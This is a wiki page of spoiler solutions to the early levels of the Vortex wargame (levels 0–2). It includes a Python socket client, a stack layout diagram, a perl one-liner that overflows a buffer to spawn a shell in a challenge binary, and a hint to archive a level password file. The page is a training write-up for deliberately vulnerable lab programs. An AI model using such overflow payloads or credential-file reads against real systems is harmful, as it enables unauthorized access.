MRL WikiMain Page | About | Help | FAQ | Special pages | Log in


Printable version | Disclaimers | Privacy policy

Wicrawl Roadmap

(Redirected from Roadmap)


Contents

[edit] Overview

This section contains some notes and solutions to the challenges on [1].

There are spoilers on this page, so don't read too far if you don't want your education to suffer.

[edit] Level 0

The instructions don't say that you have to send the results back in binary, and that it should probably be a 64-bit integer ("long long"), because 4 random 32-bit numbers usually add up to something bigger than a 32-bit integer. Here's one way to do it:

#!/usr/bin/env python

import sys
from struct import *
from socket import *

s = socket(AF_INET, SOCK_STREAM)
s.connect(("vortex.labs.pulltheplug.org", 5842))
buf = ""
while len(buf) < 16:
        buf = buf + s.recv(4)

print len(buf)
ints = unpack("IIII", buf)

result = ints[0] + ints[1] + ints[2] + ints[3]
print result

s.send(pack("Q", result))
print s.recv(1000)

[edit] Level 1

The first thing we need to do is make a stack picture. It looks like this:

^
|
higher memory

RIP MSB
RIP
RIP
RIP LSB
EBP MSB
EBP
EBP 
EBP LSB
buf[255]
buf[254]
.
.
.
buf[0]
ptr MSB <-- target
ptr
ptr
ptr LSB 

lower memory
|
v

MSB stands for most significant byte, and LSB stands for least significant byte. Remember that on x86, the four bytes of a four-byte integer are stored in little-endian order, so the LSB is the first thing in memory if you're looking from low to high memory.

The trick here is to write two bytes after decrementing the pointer, because you have to trigger the call to e() after writing the 0xca overflow byte. Now, if you do something like this:

perl -e 'print "\\" x 257 . "\xca"' >> /tmp/slashes
/levels/level1 < /tmp/slashes

You'll see this:

bash-2.05b$ /levels/level1 < /tmp/slashes
sh-2.05b$ exit
bash-2.05b$

What happened?

Well, after the shell spawns, it tries to read some commands from standard input. But you redirected its standard input from the file /tmp/slashes, and you've read all the input from it to do your sploit. So, the shell tries to read and gets an EOF, which is the same thing as the exit command in bash. Try it by hitting CTRL-D, the UNIX EOF character, in a shell -- you'll immediately get logged out.

So that the exec'ed shell doesn't immediately read EOF and quit, you can cut and paste the overflow string to the terminal while executing level1 interactively. That way, your keyboard will be connected to the spawned shell's standard input, and you can run commands.

[edit] Level 2

Just create a tar archive. But what to put in it? The password, of course, which is in /etc/pass/level3.

Retrieved from "http://www.midnightresearch.com/wiki/index.php/Wicrawl_Roadmap"

This page has been accessed 3,885 times. This page was last modified on 17 July 2007, at 05:45.


Find

Browse
Main Page
Community portal
Current events
Recent changes
Random page
Help
Edit
Edit this page
Editing help
This page
Discuss this page
New section
Printable version
Context
Page history
What links here
Related changes
My pages
Log in / create account
Special pages
New pages
File list
Statistics
Moreā€¦